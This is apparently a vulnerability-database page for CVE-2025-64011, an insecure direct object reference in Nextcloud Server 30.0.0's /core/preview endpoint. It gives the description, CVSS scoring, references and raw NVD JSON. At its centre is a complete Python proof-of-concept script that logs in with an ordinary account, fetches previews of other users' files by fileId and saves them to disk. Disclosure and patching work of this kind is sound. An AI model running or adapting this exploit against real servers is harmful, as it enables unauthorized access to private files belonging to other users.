CVE-2025-64011

Description

Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the fileId parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:nextcloud_server:30.0.0:-:*:*:*:*:*:* - VULNERABLE

Nextcloud Server 30.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-64011 PoC - Nextcloud Server IDOR in /core/preview
# Authenticated users can access arbitrary file previews via fileId manipulation

def exploit_nextcloud_idor(base_url, username, password, target_file_id):
    """
    Exploit Nextcloud Server IDOR vulnerability in /core/preview endpoint
    
    Args:
        base_url: Nextcloud server base URL (e.g., 'https://cloud.example.com')
        username: Valid Nextcloud username
        password: Password for the account
        target_file_id: File ID of the target file to preview
    
    Returns:
        Preview image/content if successful, None otherwise
    """
    session = requests.Session()
    
    # Step 1: Authenticate to Nextcloud
    login_url = f"{base_url}/index.php/login"
    login_data = {
        'user': username,
        'password': password,
        'timezone': 'UTC',
        'timezone_offset': '0'
    }
    
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Authentication failed with status {response.status_code}")
            return None
        print(f"[+] Successfully authenticated as {username}")
    except requests.RequestException as e:
        print(f"[-] Authentication error: {e}")
        return None
    
    # Step 2: Exploit IDOR by requesting preview with target fileId
    preview_url = f"{base_url}/core/preview?fileId={target_file_id}&x=32&y=32&a=1&mode=cover"
    
    try:
        response = session.get(preview_url, timeout=10)
        
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] Successfully accessed preview for file ID: {target_file_id}")
            print(f"[+] Content-Type: {response.headers.get('Content-Type', 'Unknown')}")
            print(f"[+] Content-Length: {len(response.content)} bytes")
            
            # Save the preview image
            output_file = f"preview_{target_file_id}.jpg"
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Preview saved to: {output_file}")
            return response.content
        else:
            print(f"[-] Failed to access preview. Status: {response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

# Usage example
if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_64011_poc.py <base_url> <username> <password> <target_file_id>")
        print("Example: python cve_2025_64011_poc.py https://cloud.example.com attacker password 12345")
        sys.exit(1)
    
    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    target_file_id = sys.argv[4]
    
    exploit_nextcloud_idor(base_url, username, password, target_file_id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64011
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64011
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64011/
[4] VulDB https://vuldb.com/cve/CVE-2025-64011
[5] https://drive.google.com/file/d/1eD3PN-u1caZYgGH96XHmJ7h_OBXEAHW4/view?usp=sharing
[6] https://gist.github.com/tarekramm/586dfe2d113fedfee6d71182570fc090
[7] https://nextcloud.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64011", "sourceIdentifier": "[email protected]", "published": "2025-12-12T17:15:45.210", "lastModified": "2025-12-19T15:47:19.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the fileId parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:30.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "E9029EB2-D570-4989-A86B-10E9107FB0E9"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1eD3PN-u1caZYgGH96XHmJ7h_OBXEAHW4/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://gist.github.com/tarekramm/586dfe2d113fedfee6d71182570fc090", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://nextcloud.com", "source": "[email protected]", "tags": ["Product"]}]}}